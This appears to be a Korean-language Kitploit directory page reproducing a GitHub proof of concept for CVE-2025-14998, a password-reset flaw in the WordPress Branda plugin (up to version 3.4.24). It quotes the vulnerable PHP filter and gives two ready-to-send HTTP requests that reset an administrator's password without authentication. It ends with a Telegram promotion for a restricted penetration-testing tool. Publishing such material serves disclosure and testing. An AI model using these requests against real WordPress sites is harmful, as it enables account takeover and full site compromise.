Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/ktn1990/cve-2025-14998
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthentication
GitHubktn1990/cve-2025-14998

CVE-2025-14998

CVE-2025-14998 워드프레스 플러그인 - Branda – White Label & Branding, 무료 로그인 페이지 커스터마이저 <= 3.4.24 - 계정 탈취를 통한 인증되지 않은 권한 상승

저장소 보기
228개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Wordpress Branda – 화이트 라벨 및 브랜딩, 무료 로그인 페이지 커스터마이저 <= 3.4.24 - 인증되지 않은 권한 상승 (계정 탈취)

CVE-2025-14998 WordPress용 Branda 플러그인은 버전 3.4.24 이하의 모든 버전에서 계정 탈취를 통한 권한 상승에 취약합니다. 이는 플러그인이 사용자의 비밀번호를 업데이트하기 전에 사용자의 신원을 제대로 확인하지 않기 때문입니다. 이를 통해 인증되지 않은 공격자가 관리자를 포함한 임의 사용자의 비밀번호를 변경하고 이를 통해 해당 계정에 접근할 수 있습니다.

더 많은 워드프레스 취약점과 독점 침투 테스트 도구를 원하시면 텔레그램 @KtN1990으로 연락주세요.

🔍 근본 원인 분석

플러그인은 random_password 필터에 후킹하여 WordPress의 비밀번호 생성 로직을 재정의합니다. WordPress가 안전한 무작위 비밀번호를 생성하도록 두지 않고, 플러그인은 이를 사용자 입력 값으로 대체합니다.

취약한 코드

root@kitploit:~
public function password_random_password_filter( $password ) {
    global $wpdb, $signup_password_use_encryption;

    if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
        $key = $_GET['key'];
    } elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
        $key = $_POST['key'];
    }

    if ( ! empty( $_POST['password_1'] ) ) {
        $password = $_POST['password_1'];
    } elseif ( ! empty( $key ) ) {
        $signup = $wpdb->get_row(
            $wpdb->prepare(
                "SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
                $key
            )
        );

        if ( ! ( empty( $signup ) || $signup->active ) ) {
            $meta = maybe_unserialize( $signup->meta );

            if ( ! empty( $meta['password'] ) ) {
                if ( 'yes' === $signup_password_use_encryption ) {
                    $password = $this->password_decrypt( $meta['password'] );
                } else {
                    $password = $meta['password'];
                }
            }
        }
    }

    return $password;
}

🧪 개념 증명 (검증됨)

1단계 — 임의 비밀번호로 비밀번호 재설정 트리거

root@kitploit:~
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded

user_login=admin&
redirect_to=&
password_1=EfUSmvnTun5XbvE6RvIB&
wp-submit=Get+New+Password

password_1 값은 공격자가 제어하는 임의의 문자열이 될 수 있습니다.


2단계 — 재설정 키와 동일한 값을 사용하여 재설정 완료

root@kitploit:~
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.local

✅ 결과

  • WordPress가 공격자가 제어하는 비밀번호를 수락합니다.
  • 관리자 비밀번호가 변경됩니다.
  • 공격자가 영향을 받는 사용자로 인증할 수 있습니다.

이메일 접근이나 유효한 비밀번호 재설정 토큰이 필요하지 않습니다.


💥 영향

인증되지 않은 공격자는 다음을 수행할 수 있습니다:

  • 모든 WordPress 사용자의 비밀번호 재설정
  • 관리자 계정 탈취
  • WordPress 설치에 대한 완전한 제어 획득
  • 플러그인, 테마 또는 콘텐츠 수정

연락처

  • @KtN1990

더 많은 취약점, Megatron을 확인하세요!

로고

  • 💣 Megatron이란? Megatron은 진지한 테스터와 레드 팀을 위해 설계된 고급 침투 테스트 도구입니다. 감사, 스캔, 인프라 테스트 등 어떤 작업을 하든 Megatron이 필요한 성능을 제공합니다.

-🛡️ 적합한 대상: – 보안 연구원 – 침투 테스터 – 윤리적 해커

  • 📦 유지 관리되는 약 230개의 레거시 연구 모듈; 안정성 및 탐지를 위한 최신 스캐너 코어 개선 사항.

  • 🎯 목적: 승인된 보안 테스트, 교육, 방어 연구 및 레드 팀 교육을 위해서만 제공됩니다. 이 릴리스는 불법적인 사용을 위한 것이 아닙니다. 배포는 제한됩니다 — 확인 및 서명된 책임 사용 동의서/NDA 이후에만 접근 가능.

-🛡 책임 있는 접근 정책 (요약):

  1. 확인된 보안 전문가, 기업 보안 팀, 공인 연구소 또는 교육 제공자에게만 접근 허용.
  2. 조직명, 역할, 공식 이메일(회사), 합법적 목적을 제공해야 합니다.
  3. 확인 및 당사의 책임 사용 동의서/NDA 서명 후에만 전체 다운로드가 허용됩니다.
  4. 오용에 대한 무관용 정책 — 악의적 사용 증거가 발견되면 접근이 취소되고 필요한 경우 신고됩니다.
  • 📩 연락처 / 요청 / 확인: @KtN1990 — 조직, 역할 및 접근 사유를 간략히 포함. 텔레그램 채널

데모

IMAGE ALT TEXT HERE

라이선스

MIT

도구 다운로드